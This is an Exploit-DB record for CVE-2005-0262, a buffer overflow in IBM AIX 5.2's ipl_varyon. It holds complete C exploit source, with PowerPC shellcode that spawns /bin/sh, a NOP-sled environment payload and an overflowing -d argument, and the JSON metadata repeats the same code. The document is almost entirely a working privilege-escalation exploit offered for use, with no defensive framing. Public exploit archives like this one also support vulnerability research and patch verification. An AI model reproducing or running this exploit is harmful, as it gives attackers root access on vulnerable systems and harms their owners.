ID EDB-ID:1045
Type exploitdb
Reporter intropy
Modified 2005-06-14T00:00:00
Description
AIX 5.2 ipl_varyon Local Elevated Privileges Exploit. CVE-2005-0262. Local exploit for aix platform
/*
*
* IBM AIX ipl_varyon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048
#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
/* lsd */
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...\n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...\n", count);
env_buffer[env_size - 1] = '\0';
memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lx\n", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+3);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...\n", count);
address_buffer[buffer_size - 1] = '\0';
return( 0 );
}
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/sbin/ipl_varyon";
args[1] = "-d";
args[2] = buffer;
args[3] = NULL;
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/sbin/ipl_varyon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]
{"bulletinFamily": "exploit", "id": "EDB-ID:1045", "cvelist": ["CVE-2005-0262"], "modified": "2005-06-14T00:00:00", "lastseen": "2016-01-31T13:26:24", "edition": 1, "sourceData": "/*\r\n *\r\n * IBM AIX ipl_varyon elevated privileges exploit\r\n *\r\n * I just wanted to play with PowerPC (Tested on 5.2)\r\n *\r\n * intropy (intropy <at> caughq.org)\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#define DEBUG 1\r\n#define BUFFERSIZE 2048\r\n#define EGGSIZE 2048\r\n\r\n#define NOP 0x60\r\n#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)\r\n\r\n/* lsd */\r\nchar shellcode_binsh[] =\r\n\"\\x7c\\xa5\\x2a\\x79\" /* xor. r5,r5,r5 */\r\n\"\\x40\\x82\\xff\\xfd\" /* bnel <shellcode> */\r\n\"\\x7f\\xe8\\x02\\xa6\" /* mflr r31 */\r\n\"\\x3b\\xff\\x01\\x20\" /* cal r31,0x120(r31) */\r\n\"\\x38\\x7f\\xff\\x08\" /* cal r3,-248(r31) */\r\n\"\\x38\\x9f\\xff\\x10\" /* cal r4,-240(r31) */\r\n\"\\x90\\x7f\\xff\\x10\" /* st r3,-240(r31) */\r\n\"\\x90\\xbf\\xff\\x14\" /* st r5,-236(r31) */\r\n\"\\x88\\x5f\\xff\\x0f\" /* lbz r2,-241(r31) */\r\n\"\\x98\\xbf\\xff\\x0f\" /* stb r5,-241(r31) */\r\n\"\\x4c\\xc6\\x33\\x42\" /* crorc cr6,cr6,cr6 */\r\n\"\\x44\\xff\\xff\\x02\" /* svca */\r\n\"/bin/sh\"\r\n\"\\x05\";\r\n\r\nunsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {\r\n int count, env_size = strlen(payload) + environment_size + 4 + 1;\r\n unsigned long address, *ret_addressp;\r\n \r\n if (DEBUG) printf(\"Adding nops to environment buffer...\");\r\n for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {\r\n *(env_buffer++) = NOP;\r\n }\r\n if (DEBUG) printf(\"size %d...\\n\", count);\r\n if (DEBUG) printf(\"Adding payload to environment buffer...\");\r\n for ( count = 0; count < strlen(payload); count++ ) {\r\n *(env_buffer++) = payload[count];\r\n }\r\n if (DEBUG) printf(\"size %d...\\n\", count);\r\n\r\n env_buffer[env_size - 1] = '\\0';\r\n\r\n memcpy(env_buffer, \"CAU=\", 4);\r\n\r\n\tmemset(address_buffer, 'A', buffer_size);\r\n\r\n address = ADDRESS;\r\n\r\n if (DEBUG) printf(\"Going for address @ 0x%lx\\n\", address);\r\n\r\n if (DEBUG) printf(\"Adding return address to buffer...\");\r\n ret_addressp = (unsigned long *)(address_buffer+3);\r\n for ( count = 0; count < buffer_size; count += 4) {\r\n *(ret_addressp++) = address;\r\n }\r\n if (DEBUG) printf(\"size %d...\\n\", count);\r\n\r\n address_buffer[buffer_size - 1] = '\\0';\r\n\r\n return( 0 );\r\n}\r\n\r\nint main()\r\n{\r\n char *buffer, *egg;\r\n char *args[3], *envs[2];\r\n\r\n buffer = (char *)malloc(BUFFERSIZE);\r\n egg = (char *)malloc(EGGSIZE);\r\n\r\n cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);\r\n\r\n args[0] = \"/usr/sbin/ipl_varyon\";\r\n args[1] = \"-d\";\r\n args[2] = buffer;\r\n args[3] = NULL;\r\n\r\n envs[0] = egg;\r\n envs[1] = NULL;\r\n\r\n execve( \"/usr/sbin/ipl_varyon\", args, envs );\r\n\r\n return( 0 );\r\n}\n\n// milw0rm.com [2005-06-14]\n", "published": "2005-06-14T00:00:00", "href": "https://www.exploit-db.com/exploits/1045/", "osvdbidlist": ["13699"], "reporter": "intropy", "hash": "1a0e189945de8d293089f6636af82661749cedf3a6027a6d85c2a9ea34405220", "title": "AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "AIX 5.2 ipl_varyon Local Elevated Privileges Exploit. CVE-2005-0262. Local exploit for aix platform", "references": [], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1045/", "viewCount": 1, "enchantments": {"vulnersScore": 2.8}}
{"result": {"cve": [{"id": "CVE-2005-0262", "type": "cve", "title": "CVE-2005-0262", "description": "Buffer overflow in ipl_varyon on AIX 5.1, 5.2, and 5.3 allows local users to execute arbitrary code via a long -d argument.", "published": "2005-05-02T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0262", "cvelist": ["CVE-2005-0262"], "lastseen": "2017-07-11T11:14:46"}]}}